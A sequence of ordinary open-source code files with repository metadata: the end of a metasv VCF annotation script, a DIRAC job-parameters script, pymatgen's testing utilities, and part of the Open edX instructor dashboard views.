vcf_record.INFO["AA_DISCORDANT_LOW"] = num_discordant_low
# get supplementary alignment stats
# Skip this for now
vcf_writer.write_record(vcf_record)
vcf_writer.close()
if __name__ == "__main__":
FORMAT = '%(levelname)s %(asctime)-15s %(name)-20s %(message)s'
logging.basicConfig(level=logging.INFO, format=FORMAT)
logger = logging.getLogger(__name__)
parser = argparse.ArgumentParser(
description="Annotate VCF with additional useful features",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("--bam", help="BAM file", required=True, type=file)
parser.add_argument("--chromosomes", nargs="+", help="Chromosomes", default=[])
parser.add_argument("--vcfs", nargs="+", help="Input VCF files", type=file)
args = parser.parse_args()
logger.info("Command-line: " + " ".join(sys.argv))
annotate_vcfs(args.bam, args.chromosomes, args.vcfs)
logger.info("All done!")
|
msahraeian/metasv
|
scripts/annotate_vcf_bam.py
|
Python
|
bsd-2-clause
| 7,661
|
[
"pysam"
] |
33ec9b34a23d8f60e149ae1090109bc95628ae7049d55cea7f3e038cba4c6cb4
|
#!/usr/bin/env python
########################################################################
# File : dirac-wms-job-parameters
# Author : Stuart Paterson
########################################################################
"""
Retrieve parameters associated to the given DIRAC job
"""
from __future__ import print_function
__RCSID__ = "$Id$"
import DIRAC
from DIRAC import gLogger
from DIRAC.Core.Base import Script
Script.setUsageMessage('\n'.join([__doc__.split('\n')[1],
'Usage:',
' %s [option|cfgfile] ... JobID ...' % Script.scriptName,
'Arguments:',
' JobID: DIRAC Job ID']))
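# Example invocation (job IDs are hypothetical):
#   dirac-wms-job-parameters 123 456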
Script.parseCommandLine(ignoreErrors=True)
args = Script.getPositionalArgs()
if len(args) < 1:
Script.showHelp()
from DIRAC.Interfaces.API.Dirac import Dirac, parseArguments
dirac = Dirac()
exitCode = 0
errorList = []
for job in parseArguments(args):
result = dirac.getJobParameters(job, printOutput=True)
if not result['OK']:
errorList.append((job, result['Message']))
exitCode = 2
else:
gLogger.notice(result['Value'])
for error in errorList:
print("ERROR %s: %s" % error)
DIRAC.exit(exitCode)
|
fstagni/DIRAC
|
Interfaces/scripts/dirac-wms-job-parameters.py
|
Python
|
gpl-3.0
| 1,263
|
[
"DIRAC"
] |
df33b76db2e7bd11e1b49d48e8c54c02df7fe23057a2c1db2fc9dbbd9b7f0e38
|
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
Common test support for pymatgen test scripts.
This single module should provide all the common functionality for pymatgen
tests in a single location, so that test scripts can just import it and work
right away.
"""
import unittest
import tempfile
import os
import numpy.testing as nptu
from io import open
from pathlib import Path
import json
from monty.json import MontyDecoder
from monty.serialization import loadfn
from monty.json import MSONable
from monty.dev import requires
from pymatgen import SETTINGS, MPRester
class PymatgenTest(unittest.TestCase):
"""
Extends unittest.TestCase with functions (taken from numpy.testing.utils)
that support the comparison of arrays.
"""
_multiprocess_shared_ = True
MODULE_DIR = Path(__file__).absolute().parent
STRUCTURES_DIR = MODULE_DIR / "structures"
TEST_FILES_DIR = MODULE_DIR / ".." / ".." / "test_files"
"""
Dict for test structures to aid testing.
"""
TEST_STRUCTURES = {}
for fn in STRUCTURES_DIR.iterdir():
TEST_STRUCTURES[fn.name.rsplit(".", 1)[0]] = loadfn(str(fn))
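    # Keys are file stems: a file named "Si.json" would be available as
    # get_structure("Si") (illustrative example).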
@classmethod
def get_structure(cls, name):
"""
Get a structure from the template directories.
:param name: Name of a structure.
:return: Structure
"""
return cls.TEST_STRUCTURES[name].copy()
@classmethod
@requires(SETTINGS.get("PMG_MAPI_KEY"), "PMG_MAPI_KEY needs to be set.")
def get_mp_structure(cls, mpid):
"""
Get a structure from MP.
:param mpid: Materials Project id.
:return: Structure
"""
m = MPRester()
return m.get_structure_by_material_id(mpid)
@staticmethod
def assertArrayAlmostEqual(actual, desired, decimal=7, err_msg='',
verbose=True):
"""
Tests if two arrays are almost equal to a tolerance. The CamelCase
naming is so that it is consistent with standard unittest methods.
"""
return nptu.assert_almost_equal(actual, desired, decimal, err_msg,
verbose)
@staticmethod
def assertDictsAlmostEqual(actual, desired, decimal=7, err_msg='',
verbose=True):
"""
Tests if two arrays are almost equal to a tolerance. The CamelCase
naming is so that it is consistent with standard unittest methods.
"""
for k, v in actual.items():
if k not in desired:
return False
v2 = desired[k]
if isinstance(v, dict):
pass_test = PymatgenTest.assertDictArraysAlmostEqual(
v, v2, decimal=decimal, err_msg=err_msg, verbose=verbose)
if not pass_test:
return False
elif isinstance(v, (list, tuple)):
pass_test = nptu.assert_almost_equal(v, v2, decimal, err_msg,
verbose)
if not pass_test:
return False
elif isinstance(v, (int, float)):
pass_test = PymatgenTest.assertAlmostEqual(v, v2)
if not pass_test:
return False
else:
assert v == v2
return True
@staticmethod
def assertArrayEqual(actual, desired, err_msg='', verbose=True):
"""
Tests if two arrays are equal. The CamelCase naming is so that it is
consistent with standard unittest methods.
"""
return nptu.assert_equal(actual, desired, err_msg=err_msg,
verbose=verbose)
@staticmethod
def assertStrContentEqual(actual, desired, err_msg='', verbose=True):
"""
Tests if two strings are equal, ignoring things like trailing spaces,
etc.
"""
lines1 = actual.split("\n")
lines2 = desired.split("\n")
if len(lines1) != len(lines2):
return False
failed = []
for l1, l2 in zip(lines1, lines2):
if l1.strip() != l2.strip():
failed.append("%s != %s" % (l1, l2))
return len(failed) == 0
def serialize_with_pickle(self, objects, protocols=None, test_eq=True):
"""
Test whether the object(s) can be serialized and deserialized with
pickle. This method tries to serialize the objects with pickle and the
protocols specified in input. Then it deserializes the pickle format
and compares the two objects with the __eq__ operator if
test_eq == True.
Args:
objects: Object or list of objects.
protocols: List of pickle protocols to test. If protocols is None,
HIGHEST_PROTOCOL is tested.
Returns:
Nested list with the objects deserialized with the specified
protocols.
"""
        # Use the pure-Python pickle so that we get the traceback in case of errors
        import pickle
from pymatgen.util.serialization import pmg_pickle_load, \
pmg_pickle_dump
# Build a list even when we receive a single object.
got_single_object = False
if not isinstance(objects, (list, tuple)):
got_single_object = True
objects = [objects]
if protocols is None:
# protocols = set([0, 1, 2] + [pickle.HIGHEST_PROTOCOL])
protocols = [pickle.HIGHEST_PROTOCOL]
        # This list will contain the objects deserialized with the different
        # protocols.
objects_by_protocol, errors = [], []
for protocol in protocols:
# Serialize and deserialize the object.
mode = "wb"
fd, tmpfile = tempfile.mkstemp(text="b" not in mode)
try:
with open(tmpfile, mode) as fh:
pmg_pickle_dump(objects, fh, protocol=protocol)
except Exception as exc:
errors.append("pickle.dump with protocol %s raised:\n%s" %
(protocol, str(exc)))
continue
try:
with open(tmpfile, "rb") as fh:
new_objects = pmg_pickle_load(fh)
except Exception as exc:
errors.append("pickle.load with protocol %s raised:\n%s" %
(protocol, str(exc)))
continue
# Test for equality
if test_eq:
for old_obj, new_obj in zip(objects, new_objects):
self.assertEqual(old_obj, new_obj)
# Save the deserialized objects and test for equality.
objects_by_protocol.append(new_objects)
if errors:
raise ValueError("\n".join(errors))
# Return nested list so that client code can perform additional tests.
if got_single_object:
return [o[0] for o in objects_by_protocol]
else:
return objects_by_protocol
def tmpfile_write(self, string):
"""
Write string to a temporary file. Returns the name of the temporary
file.
"""
        fd, tmpfile = tempfile.mkstemp(text=True)
        os.close(fd)  # reopened by path below; avoid leaking the descriptor
with open(tmpfile, "w") as fh:
fh.write(string)
return tmpfile
def assertMSONable(self, obj, test_if_subclass=True):
"""
Tests if obj is MSONable and tries to verify whether the contract is
fulfilled.
By default, the method tests whether obj is an instance of MSONable.
This check can be deactivated by setting test_if_subclass to False.
"""
if test_if_subclass:
self.assertIsInstance(obj, MSONable)
self.assertDictEqual(obj.as_dict(), obj.__class__.from_dict(
obj.as_dict()).as_dict())
json.loads(obj.to_json(), cls=MontyDecoder)
|
mbkumar/pymatgen
|
pymatgen/util/testing.py
|
Python
|
mit
| 7,992
|
[
"pymatgen"
] |
6ac0cd7723fc49021e4ec5490b3a7663be33d1487e47a1ebe1aae0c59682593e
|
"""
Instructor Dashboard Views
"""
import datetime
import logging
import uuid
from urlparse import urljoin
import pytz
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.urls import reverse
from django.http import Http404, HttpResponseServerError
from django.utils.html import escape
from django.utils.translation import ugettext as _
from django.utils.translation import ugettext_noop
from django.views.decorators.cache import cache_control
from django.views.decorators.csrf import ensure_csrf_cookie
from django.views.decorators.http import require_POST
from mock import patch
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey
from six import text_type
from xblock.field_data import DictFieldData
from xblock.fields import ScopeIds
from bulk_email.models import BulkEmailFlag
from lms.djangoapps.certificates import api as certs_api
from lms.djangoapps.certificates.models import (
CertificateGenerationConfiguration,
CertificateGenerationHistory,
CertificateInvalidation,
CertificateStatuses,
CertificateWhitelist,
GeneratedCertificate
)
from class_dashboard.dashboard_data import get_array_section_has_problem, get_section_display_name
from course_modes.models import CourseMode, CourseModesArchive
from courseware.access import has_access
from courseware.courses import get_course_by_id, get_studio_url
from django_comment_client.utils import available_division_schemes, has_forum_access
from django_comment_common.models import FORUM_ROLE_ADMINISTRATOR, CourseDiscussionSettings
from edxmako.shortcuts import render_to_response
from lms.djangoapps.courseware.module_render import get_module_by_usage_id
from lms.djangoapps.grades.config.waffle import waffle_flags, WRITABLE_GRADEBOOK
from openedx.core.djangoapps.course_groups.cohorts import DEFAULT_COHORT_NAME, get_course_cohorts, is_course_cohorted
from openedx.core.djangoapps.site_configuration import helpers as configuration_helpers
from openedx.core.djangoapps.verified_track_content.models import VerifiedTrackCohortedCourse
from openedx.core.djangolib.markup import HTML, Text
from openedx.core.lib.url_utils import quote_slashes
from openedx.core.lib.xblock_utils import wrap_xblock
from shoppingcart.models import Coupon, CourseRegCodeItem, PaidCourseRegistration
from student.models import CourseEnrollment
from student.roles import CourseFinanceAdminRole, CourseSalesAdminRole, CourseStaffRole, CourseInstructorRole
from util.json_request import JsonResponse
from xmodule.html_module import HtmlDescriptor
from xmodule.modulestore.django import modulestore
from xmodule.tabs import CourseTab
from .tools import get_units_with_due_date, title_or_url
log = logging.getLogger(__name__)
class InstructorDashboardTab(CourseTab):
"""
Defines the Instructor Dashboard view type that is shown as a course tab.
"""
type = "instructor"
title = ugettext_noop('Instructor')
view_name = "instructor_dashboard"
is_dynamic = True # The "Instructor" tab is instead dynamically added when it is enabled
@classmethod
def is_enabled(cls, course, user=None):
"""
Returns true if the specified user has staff access.
"""
return bool(user and has_access(user, 'staff', course, course.id))
def show_analytics_dashboard_message(course_key):
"""
Defines whether or not the analytics dashboard URL should be displayed.
Arguments:
course_key (CourseLocator): The course locator to display the analytics dashboard message on.
"""
if hasattr(course_key, 'ccx'):
ccx_analytics_enabled = settings.FEATURES.get('ENABLE_CCX_ANALYTICS_DASHBOARD_URL', False)
return settings.ANALYTICS_DASHBOARD_URL and ccx_analytics_enabled
return settings.ANALYTICS_DASHBOARD_URL
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
def instructor_dashboard_2(request, course_id):
""" Display the instructor dashboard for a course. """
try:
course_key = CourseKey.from_string(course_id)
except InvalidKeyError:
log.error(u"Unable to find course with course key %s while loading the Instructor Dashboard.", course_id)
return HttpResponseServerError()
course = get_course_by_id(course_key, depth=0)
access = {
'admin': request.user.is_staff,
'instructor': bool(has_access(request.user, 'instructor', course)),
'finance_admin': CourseFinanceAdminRole(course_key).has_user(request.user),
'sales_admin': CourseSalesAdminRole(course_key).has_user(request.user),
'staff': bool(has_access(request.user, 'staff', course)),
'forum_admin': has_forum_access(request.user, course_key, FORUM_ROLE_ADMINISTRATOR),
}
if not access['staff']:
raise Http404()
is_white_label = CourseMode.is_white_label(course_key)
reports_enabled = configuration_helpers.get_value('SHOW_ECOMMERCE_REPORTS', False)
sections = [
_section_course_info(course, access),
_section_membership(course, access),
_section_cohort_management(course, access),
_section_discussions_management(course, access),
_section_student_admin(course, access),
_section_data_download(course, access),
]
analytics_dashboard_message = None
if show_analytics_dashboard_message(course_key):
# Construct a URL to the external analytics dashboard
analytics_dashboard_url = '{0}/courses/{1}'.format(settings.ANALYTICS_DASHBOARD_URL, unicode(course_key))
link_start = HTML("<a href=\"{}\" target=\"_blank\">").format(analytics_dashboard_url)
analytics_dashboard_message = _(
"To gain insights into student enrollment and participation {link_start}"
"visit {analytics_dashboard_name}, our new course analytics product{link_end}."
)
analytics_dashboard_message = Text(analytics_dashboard_message).format(
link_start=link_start, link_end=HTML("</a>"), analytics_dashboard_name=settings.ANALYTICS_DASHBOARD_NAME)
# Temporarily show the "Analytics" section until we have a better way of linking to Insights
sections.append(_section_analytics(course, access))
# Check if there is corresponding entry in the CourseMode Table related to the Instructor Dashboard course
course_mode_has_price = False
paid_modes = CourseMode.paid_modes_for_course(course_key)
if len(paid_modes) == 1:
course_mode_has_price = True
elif len(paid_modes) > 1:
log.error(
u"Course %s has %s course modes with payment options. Course must only have "
u"one paid course mode to enable eCommerce options.",
unicode(course_key), len(paid_modes)
)
if settings.FEATURES.get('INDIVIDUAL_DUE_DATES') and access['instructor']:
sections.insert(3, _section_extensions(course))
# Gate access to course email by feature flag & by course-specific authorization
if BulkEmailFlag.feature_enabled(course_key):
sections.append(_section_send_email(course, access))
    # Gate access to Metrics tab by feature flag and staff authorization
if settings.FEATURES['CLASS_DASHBOARD'] and access['staff']:
sections.append(_section_metrics(course, access))
# Gate access to Ecommerce tab
if course_mode_has_price and (access['finance_admin'] or access['sales_admin']):
sections.append(_section_e_commerce(course, access, paid_modes[0], is_white_label, reports_enabled))
# Gate access to Special Exam tab depending if either timed exams or proctored exams
# are enabled in the course
user_has_access = any([
request.user.is_staff,
CourseStaffRole(course_key).has_user(request.user),
CourseInstructorRole(course_key).has_user(request.user)
])
course_has_special_exams = course.enable_proctored_exams or course.enable_timed_exams
can_see_special_exams = course_has_special_exams and user_has_access and settings.FEATURES.get(
'ENABLE_SPECIAL_EXAMS', False)
if can_see_special_exams:
sections.append(_section_special_exams(course, access))
# Certificates panel
# This is used to generate example certificates
# and enable self-generated certificates for a course.
# Note: This is hidden for all CCXs
certs_enabled = CertificateGenerationConfiguration.current().enabled and not hasattr(course_key, 'ccx')
if certs_enabled and access['admin']:
sections.append(_section_certificates(course))
openassessment_blocks = modulestore().get_items(
course_key, qualifiers={'category': 'openassessment'}
)
# filter out orphaned openassessment blocks
openassessment_blocks = [
block for block in openassessment_blocks if block.parent is not None
]
# TODO: Uncomment this code after upgrading ora2
# if len(openassessment_blocks) > 0:
# sections.append(_section_open_response_assessment(request, course, openassessment_blocks, access))
disable_buttons = not _is_small_course(course_key)
certificate_white_list = CertificateWhitelist.get_certificate_white_list(course_key)
generate_certificate_exceptions_url = reverse(
'generate_certificate_exceptions',
kwargs={'course_id': unicode(course_key), 'generate_for': ''}
)
generate_bulk_certificate_exceptions_url = reverse(
'generate_bulk_certificate_exceptions',
kwargs={'course_id': unicode(course_key)}
)
certificate_exception_view_url = reverse(
'certificate_exception_view',
kwargs={'course_id': unicode(course_key)}
)
certificate_invalidation_view_url = reverse(
'certificate_invalidation_view',
kwargs={'course_id': unicode(course_key)}
)
certificate_invalidations = CertificateInvalidation.get_certificate_invalidations(course_key)
context = {
'course': course,
'studio_url': get_studio_url(course, 'course'),
'sections': sections,
'disable_buttons': disable_buttons,
'analytics_dashboard_message': analytics_dashboard_message,
'certificate_white_list': certificate_white_list,
'certificate_invalidations': certificate_invalidations,
'generate_certificate_exceptions_url': generate_certificate_exceptions_url,
'generate_bulk_certificate_exceptions_url': generate_bulk_certificate_exceptions_url,
'certificate_exception_view_url': certificate_exception_view_url,
'certificate_invalidation_view_url': certificate_invalidation_view_url,
}
return render_to_response('instructor/instructor_dashboard_2/instructor_dashboard_2.html', context)
## Section functions starting with _section return a dictionary of section data.
## The dictionary must include at least {
## 'section_key': 'circus_expo'
## 'section_display_name': 'Circus Expo'
## }
## section_key will be used as a css attribute, javascript tie-in, and template import filename.
## section_display_name will be used to generate link titles in the nav bar.
def _section_e_commerce(course, access, paid_mode, coupons_enabled, reports_enabled):
""" Provide data for the corresponding dashboard section """
course_key = course.id
coupons = Coupon.objects.filter(course_id=course_key).order_by('-is_active')
course_price = paid_mode.min_price
total_amount = None
if access['finance_admin']:
single_purchase_total = PaidCourseRegistration.get_total_amount_of_purchased_item(course_key)
bulk_purchase_total = CourseRegCodeItem.get_total_amount_of_purchased_item(course_key)
total_amount = single_purchase_total + bulk_purchase_total
section_data = {
'section_key': 'e-commerce',
'section_display_name': _('E-Commerce'),
'access': access,
'course_id': unicode(course_key),
'currency_symbol': settings.PAID_COURSE_REGISTRATION_CURRENCY[1],
'ajax_remove_coupon_url': reverse('remove_coupon', kwargs={'course_id': unicode(course_key)}),
'ajax_get_coupon_info': reverse('get_coupon_info', kwargs={'course_id': unicode(course_key)}),
'get_user_invoice_preference_url': reverse('get_user_invoice_preference', kwargs={'course_id': unicode(course_key)}),
'sale_validation_url': reverse('sale_validation', kwargs={'course_id': unicode(course_key)}),
'ajax_update_coupon': reverse('update_coupon', kwargs={'course_id': unicode(course_key)}),
'ajax_add_coupon': reverse('add_coupon', kwargs={'course_id': unicode(course_key)}),
'get_sale_records_url': reverse('get_sale_records', kwargs={'course_id': unicode(course_key)}),
'get_sale_order_records_url': reverse('get_sale_order_records', kwargs={'course_id': unicode(course_key)}),
'instructor_url': reverse('instructor_dashboard', kwargs={'course_id': unicode(course_key)}),
'get_registration_code_csv_url': reverse('get_registration_codes', kwargs={'course_id': unicode(course_key)}),
'generate_registration_code_csv_url': reverse('generate_registration_codes', kwargs={'course_id': unicode(course_key)}),
'active_registration_code_csv_url': reverse('active_registration_codes', kwargs={'course_id': unicode(course_key)}),
'spent_registration_code_csv_url': reverse('spent_registration_codes', kwargs={'course_id': unicode(course_key)}),
'set_course_mode_url': reverse('set_course_mode_price', kwargs={'course_id': unicode(course_key)}),
'download_coupon_codes_url': reverse('get_coupon_codes', kwargs={'course_id': unicode(course_key)}),
'enrollment_report_url': reverse('get_enrollment_report', kwargs={'course_id': unicode(course_key)}),
'exec_summary_report_url': reverse('get_exec_summary_report', kwargs={'course_id': unicode(course_key)}),
'list_financial_report_downloads_url': reverse('list_financial_report_downloads',
kwargs={'course_id': unicode(course_key)}),
'list_instructor_tasks_url': reverse('list_instructor_tasks', kwargs={'course_id': unicode(course_key)}),
'look_up_registration_code': reverse('look_up_registration_code', kwargs={'course_id': unicode(course_key)}),
'coupons': coupons,
'sales_admin': access['sales_admin'],
'coupons_enabled': coupons_enabled,
'reports_enabled': reports_enabled,
'course_price': course_price,
'total_amount': total_amount,
'is_ecommerce_course': is_ecommerce_course(course_key)
}
return section_data
def _section_special_exams(course, access):
""" Provide data for the corresponding dashboard section """
course_key = unicode(course.id)
from edx_proctoring.api import is_backend_dashboard_available
section_data = {
'section_key': 'special_exams',
'section_display_name': _('Special Exams'),
'access': access,
'course_id': course_key,
'show_dashboard': is_backend_dashboard_available(course_key),
}
return section_data
def _section_certificates(course):
"""Section information for the certificates panel.
The certificates panel allows global staff to generate
example certificates and enable self-generated certificates
for a course.
Arguments:
course (Course)
Returns:
dict
"""
example_cert_status = None
html_cert_enabled = certs_api.has_html_certificates_enabled(course)
if html_cert_enabled:
can_enable_for_course = True
else:
example_cert_status = certs_api.example_certificates_status(course.id)
# Allow the user to enable self-generated certificates for students
# *only* once a set of example certificates has been successfully generated.
# If certificates have been misconfigured for the course (for example, if
# the PDF template hasn't been uploaded yet), then we don't want
# to turn on self-generated certificates for students!
can_enable_for_course = (
example_cert_status is not None and
all(
cert_status['status'] == 'success'
for cert_status in example_cert_status
)
)
instructor_generation_enabled = settings.FEATURES.get('CERTIFICATES_INSTRUCTOR_GENERATION', False)
certificate_statuses_with_count = {
certificate['status']: certificate['count']
for certificate in GeneratedCertificate.get_unique_statuses(course_key=course.id)
}
return {
'section_key': 'certificates',
'section_display_name': _('Certificates'),
'example_certificate_status': example_cert_status,
'can_enable_for_course': can_enable_for_course,
'enabled_for_course': certs_api.cert_generation_enabled(course.id),
'is_self_paced': course.self_paced,
'instructor_generation_enabled': instructor_generation_enabled,
'html_cert_enabled': html_cert_enabled,
'active_certificate': certs_api.get_active_web_certificate(course),
'certificate_statuses_with_count': certificate_statuses_with_count,
'status': CertificateStatuses,
'certificate_generation_history':
CertificateGenerationHistory.objects.filter(course_id=course.id).order_by("-created"),
'urls': {
'generate_example_certificates': reverse(
'generate_example_certificates',
kwargs={'course_id': course.id}
),
'enable_certificate_generation': reverse(
'enable_certificate_generation',
kwargs={'course_id': course.id}
),
'start_certificate_generation': reverse(
'start_certificate_generation',
kwargs={'course_id': course.id}
),
'start_certificate_regeneration': reverse(
'start_certificate_regeneration',
kwargs={'course_id': course.id}
),
'list_instructor_tasks_url': reverse(
'list_instructor_tasks',
kwargs={'course_id': course.id}
),
}
}
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_POST
@login_required
def set_course_mode_price(request, course_id):
"""
set the new course price and add new entry in the CourseModesArchive Table
"""
try:
course_price = int(request.POST['course_price'])
except ValueError:
return JsonResponse(
{'message': _("Please Enter the numeric value for the course price")},
status=400) # status code 400: Bad Request
currency = request.POST['currency']
course_key = CourseKey.from_string(course_id)
course_honor_mode = CourseMode.objects.filter(mode_slug='honor', course_id=course_key)
if not course_honor_mode:
return JsonResponse(
{'message': _("CourseMode with the mode slug({mode_slug}) DoesNotExist").format(mode_slug='honor')},
status=400) # status code 400: Bad Request
CourseModesArchive.objects.create(
course_id=course_id, mode_slug='honor', mode_display_name='Honor Code Certificate',
min_price=course_honor_mode[0].min_price, currency=course_honor_mode[0].currency,
expiration_datetime=datetime.datetime.now(pytz.utc), expiration_date=datetime.date.today()
)
course_honor_mode.update(
min_price=course_price,
currency=currency
)
return JsonResponse({'message': _("CourseMode price updated successfully")})
def _section_course_info(course, access):
""" Provide data for the corresponding dashboard section """
course_key = course.id
section_data = {
'section_key': 'course_info',
'section_display_name': _('Course Info'),
'access': access,
'course_id': course_key,
'course_display_name': course.display_name_with_default,
'course_org': course.display_org_with_default,
'course_number': course.display_number_with_default,
'has_started': course.has_started(),
'has_ended': course.has_ended(),
'start_date': course.start,
'end_date': course.end,
'num_sections': len(course.children),
'list_instructor_tasks_url': reverse('list_instructor_tasks', kwargs={'course_id': unicode(course_key)}),
}
if settings.FEATURES.get('DISPLAY_ANALYTICS_ENROLLMENTS'):
section_data['enrollment_count'] = CourseEnrollment.objects.enrollment_counts(course_key)
if show_analytics_dashboard_message(course_key):
# dashboard_link is already made safe in _get_dashboard_link
dashboard_link = _get_dashboard_link(course_key)
        # so we can use Text() here; it is not double-escaped and the HTML renders on the front end
message = Text(_("Enrollment data is now available in {dashboard_link}.")).format(dashboard_link=dashboard_link)
section_data['enrollment_message'] = message
if settings.FEATURES.get('ENABLE_SYSADMIN_DASHBOARD'):
section_data['detailed_gitlogs_url'] = reverse('gitlogs_detail', kwargs={'course_id': unicode(course_key)})
try:
sorted_cutoffs = sorted(course.grade_cutoffs.items(), key=lambda i: i[1], reverse=True)
advance = lambda memo, (letter, score): "{}: {}, ".format(letter, score) + memo
section_data['grade_cutoffs'] = reduce(advance, sorted_cutoffs, "")[:-2]
except Exception: # pylint: disable=broad-except
section_data['grade_cutoffs'] = "Not Available"
try:
section_data['course_errors'] = [(escape(a), '') for (a, _unused) in modulestore().get_course_errors(course.id)]
except Exception: # pylint: disable=broad-except
section_data['course_errors'] = [('Error fetching errors', '')]
return section_data
def _section_membership(course, access):
""" Provide data for the corresponding dashboard section """
course_key = course.id
ccx_enabled = settings.FEATURES.get('CUSTOM_COURSES_EDX', False) and course.enable_ccx
enrollment_role_choices = configuration_helpers.get_value('MANUAL_ENROLLMENT_ROLE_CHOICES',
settings.MANUAL_ENROLLMENT_ROLE_CHOICES)
section_data = {
'section_key': 'membership',
'section_display_name': _('Membership'),
'access': access,
'ccx_is_enabled': ccx_enabled,
'enroll_button_url': reverse('students_update_enrollment', kwargs={'course_id': unicode(course_key)}),
'unenroll_button_url': reverse('students_update_enrollment', kwargs={'course_id': unicode(course_key)}),
'upload_student_csv_button_url': reverse('register_and_enroll_students', kwargs={'course_id': unicode(course_key)}),
'modify_beta_testers_button_url': reverse('bulk_beta_modify_access', kwargs={'course_id': unicode(course_key)}),
'list_course_role_members_url': reverse('list_course_role_members', kwargs={'course_id': unicode(course_key)}),
'modify_access_url': reverse('modify_access', kwargs={'course_id': unicode(course_key)}),
'list_forum_members_url': reverse('list_forum_members', kwargs={'course_id': unicode(course_key)}),
'update_forum_role_membership_url': reverse('update_forum_role_membership', kwargs={'course_id': unicode(course_key)}),
'enrollment_role_choices': enrollment_role_choices
}
return section_data
def _section_cohort_management(course, access):
""" Provide data for the corresponding cohort management section """
course_key = course.id
ccx_enabled = hasattr(course_key, 'ccx')
section_data = {
'section_key': 'cohort_management',
'section_display_name': _('Cohorts'),
'access': access,
'ccx_is_enabled': ccx_enabled,
'course_cohort_settings_url': reverse(
'course_cohort_settings',
kwargs={'course_key_string': unicode(course_key)}
),
'cohorts_url': reverse('cohorts', kwargs={'course_key_string': unicode(course_key)}),
'upload_cohorts_csv_url': reverse('add_users_to_cohorts', kwargs={'course_id': unicode(course_key)}),
'verified_track_cohorting_url': reverse(
'verified_track_cohorting', kwargs={'course_key_string': unicode(course_key)}
),
}
return section_data
def _section_discussions_management(course, access):
""" Provide data for the corresponding discussion management section """
course_key = course.id
enrollment_track_schemes = available_division_schemes(course_key)
section_data = {
'section_key': 'discussions_management',
'section_display_name': _('Discussions'),
'is_hidden': (not is_course_cohorted(course_key) and
CourseDiscussionSettings.ENROLLMENT_TRACK not in enrollment_track_schemes),
'discussion_topics_url': reverse('discussion_topics', kwargs={'course_key_string': unicode(course_key)}),
'course_discussion_settings': reverse(
'course_discussions_settings',
kwargs={'course_key_string': unicode(course_key)}
),
}
return section_data
def _is_small_course(course_key):
""" Compares against MAX_ENROLLMENT_INSTR_BUTTONS to determine if course enrollment is considered small. """
is_small_course = False
enrollment_count = CourseEnrollment.objects.num_enrolled_in(course_key)
max_enrollment_for_buttons = settings.FEATURES.get("MAX_ENROLLMENT_INSTR_BUTTONS")
if max_enrollment_for_buttons is not None:
is_small_course = enrollment_count <= max_enrollment_for_buttons
return is_small_course
def _section_student_admin(course, access):
""" Provide data for the corresponding dashboard section """
course_key = course.id
is_small_course = _is_small_course(course_key)
section_data = {
'section_key': 'student_admin',
'section_display_name': _('Student Admin'),
'access': access,
'is_small_course': is_small_course,
'get_student_enrollment_status_url': reverse(
'get_student_enrollment_status',
kwargs={'course_id': unicode(course_key)}
),
'get_student_progress_url_url': reverse('get_student_progress_url', kwargs={'course_id': unicode(course_key)}),
'enrollment_url': reverse('students_update_enrollment', kwargs={'course_id': unicode(course_key)}),
'reset_student_attempts_url': reverse('reset_student_attempts', kwargs={'course_id': unicode(course_key)}),
'reset_student_attempts_for_entrance_exam_url': reverse(
'reset_student_attempts_for_entrance_exam',
kwargs={'course_id': unicode(course_key)},
),
'rescore_problem_url': reverse('rescore_problem', kwargs={'course_id': unicode(course_key)}),
'override_problem_score_url': reverse('override_problem_score', kwargs={'course_id': unicode(course_key)}),
'rescore_entrance_exam_url': reverse('rescore_entrance_exam', kwargs={'course_id': unicode(course_key)}),
'student_can_skip_entrance_exam_url': reverse(
'mark_student_can_skip_entrance_exam',
kwargs={'course_id': unicode(course_key)},
),
'list_instructor_tasks_url': reverse('list_instructor_tasks', kwargs={'course_id': unicode(course_key)}),
'list_entrace_exam_instructor_tasks_url': reverse('list_entrance_exam_instructor_tasks',
kwargs={'course_id': unicode(course_key)}),
'spoc_gradebook_url': reverse('spoc_gradebook', kwargs={'course_id': unicode(course_key)}),
}
if waffle_flags()[WRITABLE_GRADEBOOK].is_enabled(course_key) and settings.WRITABLE_GRADEBOOK_URL:
section_data['writable_gradebook_url'] = urljoin(settings.WRITABLE_GRADEBOOK_URL, '/' + text_type(course_key))
return section_data
def _section_extensions(course):
""" Provide data for the corresponding dashboard section """
section_data = {
'section_key': 'extensions',
'section_display_name': _('Extensions'),
'units_with_due_dates': [(title_or_url(unit), unicode(unit.location))
for unit in get_units_with_due_date(course)],
'change_due_date_url': reverse('change_due_date', kwargs={'course_id': unicode(course.id)}),
'reset_due_date_url': reverse('reset_due_date', kwargs={'course_id': unicode(course.id)}),
'show_unit_extensions_url': reverse('show_unit_extensions', kwargs={'course_id': unicode(course.id)}),
'show_student_extensions_url': reverse('show_student_extensions', kwargs={'course_id': unicode(course.id)}),
}
return section_data
def _section_data_download(course, access):
""" Provide data for the corresponding dashboard section """
course_key = course.id
show_proctored_report_button = (
settings.FEATURES.get('ENABLE_SPECIAL_EXAMS', False) and
course.enable_proctored_exams
)
section_data = {
'section_key': 'data_download',
'section_display_name': _('Data Download'),
'access': access,
'show_generate_proctored_exam_report_button': show_proctored_report_button,
'get_problem_responses_url': reverse('get_problem_responses', kwargs={'course_id': unicode(course_key)}),
'get_grading_config_url': reverse('get_grading_config', kwargs={'course_id': unicode(course_key)}),
'get_students_features_url': reverse('get_students_features', kwargs={'course_id': unicode(course_key)}),
'get_issued_certificates_url': reverse(
'get_issued_certificates', kwargs={'course_id': unicode(course_key)}
),
'get_students_who_may_enroll_url': reverse(
'get_students_who_may_enroll', kwargs={'course_id': unicode(course_key)}
),
'get_anon_ids_url': reverse('get_anon_ids', kwargs={'course_id': unicode(course_key)}),
'list_proctored_results_url': reverse('get_proctored_exam_results', kwargs={'course_id': unicode(course_key)}),
'list_instructor_tasks_url': reverse('list_instructor_tasks', kwargs={'course_id': unicode(course_key)}),
'list_report_downloads_url': reverse('list_report_downloads', kwargs={'course_id': unicode(course_key)}),
'calculate_grades_csv_url': reverse('calculate_grades_csv', kwargs={'course_id': unicode(course_key)}),
